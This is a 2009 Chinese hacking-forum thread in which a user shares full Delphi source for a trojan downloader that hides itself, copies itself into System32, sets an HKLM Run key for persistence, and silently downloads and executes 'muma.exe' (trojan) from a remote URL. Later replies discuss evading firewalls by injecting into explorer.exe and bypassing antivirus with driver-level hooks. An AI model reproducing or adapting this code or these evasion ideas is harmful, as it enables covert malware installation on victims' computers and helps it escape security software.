论坛: 菜鸟乐园 标题: 写了个普通的下载者 复制本贴地址    
作者: Winmillion [winmillion]    论坛用户   登录
unit Unit1;

interface

uses
Windows, Messages, Classes, ExtCtrls, SysUtils, Variants, Graphics, Controls, Forms,
Dialogs, UrlMon,Registry;

type
TForm1 = class(TForm)
    Timer1: TTimer;
    procedure Timer1Timer(Sender: TObject);
    procedure FormCreate(Sender: TObject);
private
    { Private declarations }
public
    { Public declarations }
end;

var
Form1: TForm1;
implementation

{$R *.dfm}
Function GetWinDir: String; //自定义GetWinDir函数,该功能是找出Windows\System32\的路径.
var
Buf:array[0..MAX_PATH] of char;
begin
    GetSystemDirectory(Buf,MAX_PATH);
    Result:= Buf;
    if Result[Length(Result)]<>'\' then Result := Result + '\';
end;

procedure TForm1.Timer1Timer(Sender: TObject); //时间控件
begin
WinExec('c:\muma.exe',SW_HIDE);    //每隔5秒执行一次
Timer1.Enabled:=False;
end;

procedure TForm1.FormCreate(Sender: TObject);
var
Reg:TRegistry;
myname:string;

begin
    application.showmainform:=false; //隐藏窗体
    myname:=ExtractFilename(Application.Exename);  //获得文件名
    if application.Exename <> GetWindir + myname then    //判断程序是否在Windows\System32\
begin
    Copyfile(pchar(application.Exename),pchar(GetWindir + myname),False);  //将自己拷贝到Windows\System32\下
    Winexec(pchar(GetWindir + myname),sw_hide);    //运行Windows\System32\下的新程序,不运行也可以!
    application.Terminate;    //退出旧程序
end;

begin
try
  try
    Reg:=TRegistry.Create;
    Reg.RootKey:=HKEY_LOCAL_MACHINE;
    if Reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True) then
    begin
    Reg.WriteString('Winmillion',GetWinDir+myname);
    Reg.CloseKey;
    Reg.Free;
    end;
  except
  end;
    if not FileExists('c:\muma.exe') then //判断木马如果不在C盘里就只是Timer
    begin
      URLDownloadToFile(nil,PChar('http://www.baidu.com/muma.exe'),
      PChar('c:\muma.exe'),0,nil);
      WinExec('c:\muma.exe',SW_HIDE);
    end
    else
      Timer1.Enabled := True;
except
end;
end;
end;
end.


地主 发表时间: 09-03-09 21:37

回复: 鬼城小菜鸟 [snqmyy023]   论坛用户   登录
顶你一下

B1层 发表时间: 09-03-11 11:53

回复: Winmillion [winmillion]   论坛用户   登录
只是个人累积收藏,拿出来共享给各位.
各位不要老是收藏,要经常使用,直到习惯就可以不用收藏了.
记住:技术没学进去,永远也不属于自己.


B2层 发表时间: 09-03-15 22:11

回复: wstarp [wstarp]   论坛用户   登录
问问 我是菜鸟 什么都不懂 一点都不懂的.!

B3层 发表时间: 09-03-16 13:29

回复: wstarp [wstarp]   论坛用户   登录
问问 我是菜鸟 什么都不懂 一点都不懂的.!

B4层 发表时间: 09-03-16 13:31

回复: 富毫 [bking]   版主   登录
呵呵。其实下载者软件真的很简单

B5层 发表时间: 09-03-17 17:49

回复: Winmillion [winmillion]   论坛用户   登录
没有谁一出生就是天才,只有不断的累积,直到领悟.相信你一定能成功的!
未来早已安排,命运早已注定,只是未发生


B6层 发表时间: 09-03-20 23:41

回复: Winmillion [winmillion]   论坛用户   登录
没有谁一出生就是天才,只有不断的累积,直到领悟.相信你一定能成功的!
未来早已安排,命运早已注定,只是未发生


B7层 发表时间: 09-03-20 23:42

回复: livly [livly]   论坛用户   登录
新人,看不懂

B8层 发表时间: 09-04-01 19:01

回复: studentol [studentol]   论坛用户   登录
还是在掉用API的基础上 没有HOOK
很容易被拦截

我的建议是
  采用驱动底层钩子 直接监听数据包 通过简单处理 达到下载的目的

但问题是 主动防御的突破很不容易呀 尤其是驱动级的

B9层 发表时间: 09-04-03 01:48

回复: Winmillion [winmillion]   论坛用户   登录
用插入IEXPLORER..EXE或插入EXPLORER.EXE进程就可以穿过防火墙了.
可是现在很少有人用IE浏览器上网,可是桌面进程EXPLORER.EXE一般防火墙如:天网都是允许桌面进程打开端口.这样就可以穿过防火墙了.


B10层 发表时间: 09-04-03 22:07

回复: studentol [studentol]   论坛用户   登录
这样的方法 讨论的太多了

而进程的插入 几乎是逃避不了主动防御的 如果你的方法能逃避 哪怕冰剑 的侦测 我都要佩服你了

底层驱动 比杀毒软件跟底层 权利更大 隐蔽性更高

是未来的主要发展方向

B11层 发表时间: 09-04-03 23:25

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号